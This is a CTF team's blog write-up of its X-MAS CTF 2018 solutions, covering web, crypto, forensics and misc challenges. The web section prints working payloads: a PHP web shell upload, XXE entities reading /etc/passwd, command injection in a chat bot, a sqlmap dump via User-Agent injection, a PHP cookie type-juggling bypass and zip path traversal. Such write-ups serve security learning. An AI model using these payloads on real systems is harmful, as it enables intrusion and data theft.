Aj Dumanhug
Dec 22, 2018 · 13 min read
XMAS-CTF

X-MAS CTF is a week-long Capture The Flag competition created by Romanian high-school CTF Team named HTsP (Hecării, Țuica și Păunii).
Our team hackstreetboys participated and managed to finish 10th place out of 1378 teams.

XMAS CTF 2018 Scoreboard
Challenges ❤

Web/Crypto

This category should only have 1 challenge called Let’s Crack the Great lapland but some participants managed to brute force or guess the next value that’s why the authors created another challenge called Let’s Crack the Greater lapland that can be solved using the intended solution.

Let’s Crack the Great lapland

“Psst, I got a task for you. There’s this monolith to which I need to get access, but I can’t get the numbers right. Can you help me? I pay well.” ~ A shady dealer gnome

Server: http://199.247.6.180:12000
Authors: Milkdrop + Gabies

Let’s Crack the Great lapland webpage

Let’s Crack the Greater lapland

“Hey, do you remember that monolith I had to get in last week? Now I stumbled upon something greater and shinier! Can you help me get access to this one?” ~ The same shady dealer gnome

Server: http://199.247.6.180:12006
Authors: Milkdrop + Gabies

Let’s Crack the Greater lapland webpage

Solution

By carefully observing the challenge title, we found out that this is about LCG. (Let’s Crack the Great lapland)

Linear Congruential Generator or LCG is an algorithm that yields a sequence of pseudo–randomized numbers calculated with a discontinuous piecewise linear equation.

The generator is defined by recurrence relation:x(n+1) = a*x(n) + b mod m where x is the sequence of pseudorandom values, m is the modulo, a is the multiplier, and b is the increment.

The objective is collect the first few set of sequence numbers from the webpage and use it to get the modulo, multiplier, and increment.

By the way, Thanks to mcm of p4 team for creating a detailed blog post about LCG. https://tailcall.net/blog/cracking-randomness-lcgs/

To get the modulo, the following code was used:

for element in range(len(x) - 1):
y.append(x[element + 1] - x[element])
for element in range(len(y) - 2):
z.append(abs(y[element + 2] * y[element] - y[element + 1] ** 2))
m = gcd(gcd(z[0], z[1]), z[2])

To get the multiplier, the following code was used:

a = (x[2] - x[1]) * invert(x[1] - x[0], n) % n

To get the increment, the following code was used:

b = (x[1] - a * x[0]) % n

Once the modulo, multiplier, and increment is obtained, we can use the following formula to predict the next numbers of the monolith.

x(n+1) = a*x(n) + b mod m

Flags

Let’s Crack the Great lapland
X-MAS{LCG_0n_7h3_LapL4nd_m0n0LiTh_1s_n0t_7ha7_s3cur3}

Let’s Crack the Greater lapland
X-MAS{Bru73_F0rc3_1s_gr34t_bu7_LCG_1s_b3tt3r___}


Web

Most of the challenges were fun but there was a challenge that was not good at all because you’ll just need to change the value of a parameter and you’ll get the flag.

GnomeArena: Rock Paper Scissors

This challenge was solved by my other teammate, either SymR or Ameer.

This new website is all the rage for every gnome in Lapland! How many games of Rock Paper Scissors can you win?

Server: http://199.247.6.180:12002
Author: Milkdrop

Solution

  • The website is about Rock, Paper, and Scissors game but I noticed that there’s a settings page and it allows us to upload file and modify our game name.
  • After analyzing the settings page, I learned that the GAME NAME is the FILE NAME of the PROFILE IMAGE and I can upload php files as PROFILE IMAGE.
  • So I uploaded a php file with following simple payload
<?php system($_GET[‘cmd’]); ?>

Flag: X-MAS{Ev3ry0ne_m0ve_aw4y_th3_h4ck3r_gn0m3_1s_1n_t0wn}

Gnome’s BU77ons

This challenge was solved by my other teammate, either SymR or Ameer.

Who wouldn’t enjoy pressing random buttons? Yeah, i guessed so! This time though, the bu77on isn’t random…

Server: http://199.247.6.180:12004
Author: Vlad

Solution

  • Just change the value of button parameter from Click here boai to flag.

Flag: X-MAS{PhPs_A1n7_m4d3_f0r_bu77_0ns___:)}

Our Christmas Wishlist

We have all gathered round to write down our wishes and desires for this Christmas! Please don’t write anything mean, Santa will be reading this!

Server: http://199.247.6.180:12001
Author: Milkdrop

Solution

  • Based on the POST Request, the data to be posted has the content type of application/xml. Therefore, this challenge could possibly vulnerable to XML External Entity or also known as XXE.
  • Using the following payload, we were able to retrieve the passwd file.
<?xml version="1.0" ?>
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<message>&xxe;</message>
Retrieving etc/passwd
  • Using the following payload below, we were able to obtain the flag.
<?xml version="1.0" ?>
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=flag.txt">
]>
<message>&xxe;</message>
Retrieving flag.txt

Flag: X-MAS{_The_Ex73rnal_Ent1t13$_W4n7_To__Jo1n_7he_p4r7y__700______}

Santa’s Helper Mechagnome

One of our main production Mechagnomes is now malfunctioning. You have to access its control panel by directly messaging Helper Mechagnome#9926 (You can find him resting on our main discord server).

Get the restart codes, and restart it so that our toy factory can continue working!

Author: Milkdrop

Solution

  • MechaGnome #9926 Control panel can execute the following commands: help, joke, add, list, sendletter, restart.
  • The only important commands are list, sendletter, and restart.
  • Executing list command will give us this emails:
- randdev@santa.com 
- toyfactory@santa.com
- weaponsilo@santa.com
- commandcenter@santa.com
- test@santa.com
- LOLOLOL@santa.com
  • Executing sendletter command requires two parameters: email and message. (sendletter email message)
  • After trying many payloads in message parameter, the following command gives us the list of files in the control panel.
    sendletter commandcenter@santa.com *
mecha.py robot_restart_codes.txt
  • Executing the following command will give us the content of robot_restart_codes.txt.
    sendletter commandcenter@santa.com $(cat robot_restart_codes.txt)
Cobalt Inc. MechaGnome Restart Codes:\r XJACO-10U4C-C091U-VNOAC-J2QCS
  • Executing restart XJACO-10U4C-C091U-VNOAC-J2QCS will restart the BOT and gives us the flag.

Flag: X-MAS{Wh0_Kn3W_4_H3lp3r_M3ch4gN0m3_W0uLd_b3_S0_vULN3R4bL3}

Santa’s lucky number

This challenge was solved by my other teammate, either SymR or Ameer.

Come on! Santa’s lucky number is pretty predictable, don’t you think? ;)

Server: http://199.247.6.180:12005
Author: Vlad

Solution

  • Visiting the website will greet us with an image of book and 3 buttons and a hint: Santa loves hiding his secrets on the page numbered as his lucky number :)
  • Clicking each button will give us a random hash.
  • Using BurpSuite Intruder, I sequentially requested the page number ranging from 0 to 5,000 and found out that page number 1327 triggers our Grep Match option that returns the flag.
Burp Intruder

Flag: X-MAS{W00pS_S0m30n3_73l1_S4n7a_h1s_c00k1eS_Ar3_BuRn1ng}

Santa’s No Password Login System

Ameer and I collaborated to solve this challenge. Ameer found that User-Agent is vulnerable to Blind SQL Injection.

We all know that Santa is quite an old man. He sometimes forgets things. Including his password.

Therefore, our high-tech gnomegineer department worked the whole last night to develop a new login system, that requires no passwords! Nifty.

Server: http://199.247.6.180:12003
Author: Milkdrop

Solution

  • Hint in the challenge is “You don’t seem to be using an official Computer from Santa’s Laboratory!” and it means that we have to do something in the user-agent.
  • Adding ‘ or ‘1’=’1 to user-agent change the “Access Denied!” to “Welcome!
  • Using sqlmap, we found out that the user-agent is vulnerable to boolean-based blind, error-based and AND/OR time-based SQL Injection.
  • The following command was executed to dump the flag from the database
sqlmap.py -u http://199.247.6.180:12003/ --user-agent="' *" --level=5 --risk=3 --dbms=mysql --dump
Dumping the flag.

Flag: X-MAS{EV3RY0NE_F34R5_TH3_BL1ND_GN0M3}

Reindeers and cookies

Ameer solved this challenge because I fell asleep and forgot to submit the flag hihi.

You cannot cmp any cookie with Santa’s cookies.

Server: http://199.247.6.180:12008
Authors: Milkdrop + Vlad

Solution

  • There are two cookies in the website, one is named as adminpass and the second one is name as cookiez.
  • the value of cookiez is encoded in base64 3 times and the readable value is {“id”:”2",”type”:”guest”}.
  • I changed the value of cookiez to {“id”:”1",”type”:”admin”} and encoded it 3 times.
  • Going back to adminpass cookie, I just added this [] to make it like this: adminpass[] why? because PHP translates variables like this to an empty array. Luckily, this challenge is using strcmp() to compare our cookie to 0. Also, it uses Loose Comparison of PHP Type Juggling, so if we have an empty array which is NULL and 0 for comparison it will return true.
    NULL == 0 will return true.
  • Final Payload is this:
Cookie: 
adminpass[]=MyLittleCookie!; cookiez=WlhsS2NGcERTVFpKYWtWcFRFTktNR1ZZUW14SmFtOXBXVmRTZEdGWE5HbG1VVDA5Q2c9PQo=;

Flag: X-MAS{S4n74_L0v35__C00kiesss_And_Juggl1ng!}

Super Secure Siberian Vault

Ever wondered where Santa might keep his most personal secrets? In the most securized Siberian vault of course! Today, the concrete and steel facility has opened to the public, and you can now use it to safeguard your very own personal secrets too, just like Santa!

Pro Tip: You can upload archives to store multiple secrets at the same time.

Server: 199.247.6.180:12007

Solution

  • The tip (or hint) gives us an idea that the file type we need to upload is an archive. It could be tar, xz, jar, rar, zip, etc.
  • I tried a lot just to determine which kind of archive should I use for this attack and decided to stick with zip to save time. Also, the Vault accepts archives up to 2KB only.
  • I tried Zip Symlink but no success. Then, I found this blog about Directory Traversal in Archives. Basically, we can perform directory traversal inside the zip file and the PHP script will help us execute the exploit when they decompress it.
  • In the blog mentioned above, they wrote a python script that will create a zip file that contains files with directory traversal as file name. Using this script, we were able to create the payload.
./evilarc.py hackstreetboys.php -p img -o unix -d 2-p = Path to include in filename after traversal.
-o = OS platform for archive (you can choose either win or unix)
-d = Number directories to traverse.

Flag: X-MAS{Z1pp3r_D0wn_S4nt4!_Y0ur_Secr3t5_4r3_n0w_0ur5}


Others

MISC: Weird Transmission

This challenge is one of the hardest challenge with only over 20 teams managed to solve it including our team.

We have intercepted a weird transmission coming from an unidentified radio station from the North Pole. Please decode it for us, it seems important.

transmission.mp3

Author: PinkiePie1189

Solution

  • Playing the audio file will greet us with a voice of a male person however we cannot clearly understand him. Fortunately, reversing the audio will help us understand him and his message.
  • Transcribing the audio will give us this message:
Dear CTF player, you have exploited littlewho's binaries, deciphered Gabies' cryptography, hack your way into Milkdrop's websites and done some forensic analysis with Googal, now another challenge awaits.The evil Grinch is holding Santa hostage in an undisclosed location we don't know his exact position.With a nice elf has told us the coordinates of nearby points.The first one is located at (511716656388765455430016138955706839007890052532, 1622805609316535864254436412730925222158623332074)The second one is at
(390390142500834541752332649936545354218395003257, 176460719206642987153469086794475382972064519404)
And the last one is at
(608097554835704767294367078594102923662585120876, 195121033653477539025103641752423493583135321761)
He also told us that Santa's home will be located where the shape formed by these three points is in complete equilibrium.Good luck and Merry Christmas.
  • Plotting those coordinates to world’s map will give us nothing and just a clear rabbit hole.
  • I requested a hint and they told me that this is a geometry challenge.
  • I quickly searched on Google for formulas related to Geometry and found Analytic Geometry’s formula in calculating the centroid mainly because it uses the given coordinates of the three vertices of a triangle.
  • The following is the final formula to calculate the centroid.
centroid = ((x1 + x2 + x3)/3, (y1 + y2 + y3)/3);
  • The following is the simple python script that calculates the centroid of the given coordinates from the audio.
x1 = 511716656388765455430016138955706839007890052532;
x2 = 390390142500834541752332649936545354218395003257;
x3 = 608097554835704767294367078594102923662585120876;
y1 = 1622805609316535864254436412730925222158623332074
y2 = 176460719206642987153469086794475382972064519404;
y3 = 195121033653477539025103641752423493583135321761;
centroid = ((x1 + x2 + x3)/3, (y1 + y2 + y3)/3);print centroid
  • The result is (503401451241768254825571955828785038962956725555, 664795787392218796811003047092608032904607724413)
  • The value of centroid above is in decimal format (base 10) and I had to convert it to HEX (base 16) and converted it to ASCII to get the flag.

Flag: X-MAS{An4ly71c_G30m3try_S4v3d_Chr157m4s}

FORENSICS: Hidden in almost plain sight

My teammate hightail and I solved this challenge. At first, we thought that this is an easy challenge because you will just do a simple forensic in a picture but it turned out that this was a steganography challenge.

A strange file was sent to Santa’s email address and he is puzzled. Help him find what’s wrong with the file and you can keep any flag you find in the process.

Solution

  • A file named celebration was given in the challenge.
  • After checking the header of the file, I noticed a familiar hex signature.
hex signature of Celebration
  • The 2nd and 3rd byte of the file is missing but I already know that this is a PNG file because 89 XX XX 47 0d 0a 1a 0a is the hex signature of PNG.
  • Adding 50 4E in the 2nd and 3rd byte will give us this image.
Celebration.png
  • Wasted too much time trying different steg tools to solve this challenge so I asked for a hint and they told me that I need to adjust something in the image.
  • Using TweakPNG, I edited the height of the image and I finally obtain the flag.
Flag

Flag: X-MAS{who_knows_wh3re_s4anta_hid3s_the_g1fts}

CRYPTO: Special Christmas Wishlist

My teammate hawkcurry (Legend in Crypto) solved this and I decided to give it a shot (lol) ‘coz I wanna learn crypto (but it’s hard).

While Santa was looking through the wishlists of the childern all around the world he came across a very strange looking one. Help Santa decode the letter in order to fulfill the wishes of this child.

(Flag is Non-Standard)
wishlist.png

UPDATE: flag is lowercase!
Author: Gabies

Solution

  • My teammate hawkcurry told us that the 2nd line from the bottom is “the flag is”.
  • Using the hint, I converted the symbols of the 2nd line from the bottom to letters. Then I started tracing other symbols with the help of known symbols.
Substitution

Flag: X-MAS{youaresogoodatsubstitutionciphers}

MISC/CRYPTO: Unown Gift

We, hackstreetboys, collaborated to solve this challenge.

Oh, how sweet, you’ve just received a gift from someone! Sadly, you can’t really wrap your head around how it’s supposed to be opened…

UnownGift

Authors: Milkdrop + Gabies + PinkiePie1189

Solution:

  • This challenge gave us a file. Based on its content, the authors xored the file.
  • Using xortool, we brute-forced the file using 256 possible keys and found out that the file was XORed with FF.
xortool -b UnownGift
  • After brute-forcing, we executed file * and we discovered something interesting. A Game Boy Advance ROM image.
file *
  • We grabbed the hex signature 7f00 00ea 24ff ae51 699a a221 3d84 820a of the file and searched on Google for it’s file extension.
gba
  • The file extension is .gba and to open that file, we need an emulator. Then, we found Boycott Advance emulator and use it make the game works.
Pokemon!
  • Then when we tried to leave the town, Prof. Oak approached our character and went to the Lab.
Prof. Oak Lab
  • Prof. Oak introduced us to 3 Poke balls that contains different Pokemons.
  • Each Pokemons has their own weird name.
Pokemons
  • Then we noticed that the variable/parameter n, e, and c are somehow related to RSA.
  • We confirmed this after checking the email on the computer.
Email
  • Hint is Rapid Secure Alternoflux keys = RSA keys
  • So we copied the value of n, e, and c to put it on our script and solve the RSA to capture the flag.
Flag!

Flag: X-MAS{Wh4t_4n_un3xp3ct3d_chr1stm45_pr3s3nt}


First of all, X-MAS CTF 2018 was really challenging and fun because they were surprisingly well built challenges.

Also, I’d like to say that I am proud to my teammates because they spent some of their time this holiday season just to solve challenges in Pwn, Web, Forensics, Misc, Crypto, and Reverse Engineering.

Finally, I hope you learned something on this blog. As always folks, thank you for reading!!!


Update: My teammate hawkcurry published his writeup for Crypto challenges. Read on: https://github.com/pberba/ctf-solutions/tree/master/20181223_xmasctf

hackstreetboys

hackstreetboys aka [hsb] is a CTF team from the Philippines

Aj Dumanhug

Written by

PSM in Cybersecurity Student

hackstreetboys

hackstreetboys aka [hsb] is a CTF team from the Philippines

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade